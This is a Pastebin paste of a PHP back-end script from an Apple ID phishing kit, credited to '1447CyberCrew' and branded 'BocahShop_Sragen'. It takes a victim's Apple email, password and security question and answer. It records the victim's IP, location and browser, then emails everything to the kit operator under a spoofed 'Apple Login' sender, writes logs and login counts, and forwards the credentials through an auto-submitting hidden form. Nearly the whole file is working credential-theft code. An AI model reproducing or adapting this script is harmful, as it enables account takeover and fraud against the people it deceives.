Advertisement
Guest User

Untitled

a guest
Dec 10th, 2018
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.16 KB | None | 0 0
  1. <?
  2. /*
  3. 1447CyberCrew
  4. */
  5. require "session_protect.php";
  6. require "functions.php";
  7.  
  8. //$GLOBALS_LOCATION=$GLOBAL.'l';
  9.  
  10. $user_agent = $_SERVER['HTTP_USER_AGENT'];
  11. $ip = $_SERVER['REMOTE_ADDR'];
  12. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  13. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  14. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  15. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  16. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  17. $VictimInfo5 = "Platform :"." ".$systemInfo['os'];
  18. $xuser = $_SESSION['user'] = $_POST['user'];
  19. $xpass = $_SESSION['pass'] = $_POST['pass'];
  20. $q1=$_POST["q1"];
  21. $a1=$_POST["a1"];
  22.  
  23. $message = "
  24. ++------[ $$ BocahShop_Sragen $$ ]------++
  25.  
  26. .++-----[ Apple Login ]-----++.
  27. Email : $xuser
  28. Password : $xpass
  29. .++---------[ End ]---------++.
  30.  
  31. .++-----[ Security Login ]-----++.
  32. Question : $q1
  33. Answer : $a1
  34. .++---------[ End ]---------++.
  35.  
  36. .++-------[ PC Info ]-------++.
  37. From : $VictimInfo1 - $VictimInfo2
  38. Browser : $VictimInfo3 - $VictimInfo4 - $VictimInfo5
  39. .++---------[ End ]---------++.
  40.  
  41. ++------[ $$ BocahShop_Sragen $$ ]------++
  42. ";
  43. /*
  44. $message = "
  45. <html>
  46. <head>
  47. <style>
  48. .demotbl {
  49. border: 0px solid #69899F;
  50. }
  51. .demotbl th{
  52. padding:15px;
  53. color:#fff;
  54. text-shadow:1px 1px 1px #568F23;
  55. border-bottom:3px solid #02e9ff;
  56. background-color:#02e9ff;
  57. background:-webkit-gradient(
  58. linear,
  59. left bottom,
  60. left top,
  61. color-stop(0.02, rgb(0, 135, 128)),
  62. color-stop(0.51, rgb(0, 135, 128)),
  63. color-stop(0.87, rgb(0, 135, 128))
  64. );
  65. background: -moz-linear-gradient(
  66. center bottom,
  67. rgb(0, 135, 128) 3%,
  68. rgb(3, 198, 188) 52%,
  69. rgb(2, 233, 255) 88%
  70. );
  71. -webkit-border-top-left-radius:5px;
  72. -webkit-border-top-right-radius:5px;
  73. -moz-border-radius:5px 5px 0px 0px;
  74. border-top-left-radius:5px;
  75. border-top-right-radius:5px;
  76. }
  77. .demotbl td{
  78. padding:10px;
  79. text-align:center;
  80. vertical-align: top;
  81. background-color:#DEF3CA;
  82. border: 1px solid #BED3AB;
  83. -moz-border-radius:2px;
  84. -webkit-border-radius:2px;
  85. border-radius:2px;
  86. color:#666;
  87. text-shadow:1px 1px 1px #fff;
  88.  
  89. }
  90. </style>
  91. <table class='demotbl'>
  92. <tr>
  93. <th colspan='5'>Apple Account Information</th>
  94. </tr>
  95. <tr>
  96. <td width='200px'>Email</td>
  97. <td colspan='5'>".$_SESSION['user']."</td>
  98. </tr>
  99. <tr>
  100. <td>Password</td>
  101. <td width='400px'>".$_SESSION['pass']."</td>
  102. </tr>
  103. <tr>
  104. <th colspan='5'>Security Login</th>
  105. </tr>
  106. <tr>
  107. <td>Question</td>
  108. <td colspan='5'>".$_POST['q1']."</td>
  109. </tr>
  110. <tr>
  111. <td>Answer</td>
  112. <td colspan='5'>".$_POST['a1']."</td>
  113. </tr>
  114. <tr>
  115. <th colspan='5'>Login Information</th>
  116. </tr>
  117. <tr>
  118. <td width='200px'>IP</td>
  119. <td colspan='5'>".$ip."</td>
  120. </tr>
  121. <tr>
  122. <td>Location</td>
  123. <td width='400px'>".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country']."</td>
  124. </tr>
  125. <tr>
  126. <td>Browser</td>
  127. <td width='400px'>".$systemInfo['useragent']."</td>
  128. </tr>
  129. </table>
  130.  
  131. </body></html>
  132.  
  133. ";
  134. */
  135.  
  136. include '../../setting.php';
  137. $rand = rand(1,1000);
  138. $subject = $_SESSION['user']." [ ".$systemInfo['country']." - $ip - ".$systemInfo['os']." ]";
  139. $headers = "From: Apple Login <admin@16digit.shop>\r\n";
  140. mail($Your_Email, $subject, $message, $headers);
  141. $file = fopen("logs/bxp.log", "a");
  142. fwrite($file, $empas);
  143. fclose($file);
  144.  
  145. $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
  146. $isi = @file_get_contents($file2);
  147. $buka = fopen($file2,"w");
  148. fwrite($buka, $isi+1);
  149. fclose($buka);
  150.  
  151. ?>
  152. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  153. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  154. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  155. </form>
  156. <script language="JavaScript">
  157. document.frm.submit();
  158. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement